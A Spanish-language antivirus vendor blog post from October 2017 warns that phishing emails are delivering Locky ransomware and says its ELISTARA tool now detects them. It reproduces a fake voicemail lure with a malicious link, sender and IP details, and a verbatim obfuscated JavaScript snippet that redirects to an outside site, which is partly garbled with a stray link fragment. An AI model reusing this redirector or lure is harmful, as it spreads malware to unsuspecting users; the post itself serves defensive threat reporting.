Y SIGUEN LLEGANDO MAILS CON LOCKY:

Publicado el 10 octubre 2017 ¬ 13:17 pmh.mscComentarios desactivados en Y SIGUEN LLEGANDO MAILS CON LOCKY:

Varios mails anexando fichero empaquetado el cual descarga e instala variantes de Locky, pasan a ser controlados a partir del ELISTARA 37.66 de hoy

Alguno de ellos viene con remitente, seguramente spoofing, como este:

 

Asunto:

De: <virus@rogde.adocean.pl>

Fecha: 10/10/2017 8:55

Para: destinatario

fichero anexado:   116873.zip  (contiene uLTrVvU.doc  con macros maliciosas instalan Locky)

Remitente:
Host: rogde.adocean.pl

IP: 128.140.224.229

País: Romania

 

 

total del fichero uLTrVvU.doc 

 

_____________

 

Asunto: New voice message 19398258048 in mailbox 193982580481 from “19398258048” <2675454431>De: “Voicemail Service” Fecha: 09/10/2017 17:22Para: destinatario
Dear user:
just wanted to let you know you were just left a 0:35 long message (number 19398258048)in mailbox 193982580481 from “19398258048” <2675454431>, on Mon, 09 Oct 2017 20:52:24 +0530so you might want to <a href=”http://profigera.pt/voicemsg.html>check</a> it when you get a chance.  Thanks!
–Voicemail Service

anexado:  msg0589653.7z   conteniendo msg018589127.vbs

 

total:

 

____________

y otros similares que ofrecen estos informes:

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/892506113a25ea4fab014eaf642a07cecd7cbb7e5b5cce189a52db050d8262de/analysis/1507633045/” target=”_blank” rel=”noopener”>ichero msg0755.7z

 

Todos ellos pasan a ser contriolados con el ELISTARA 37.66 de hoy, que estará disponible en nuestra web a partir del 11/10 prox

saludos
ms, 10-10-2017

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Spam, Virus, ,

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies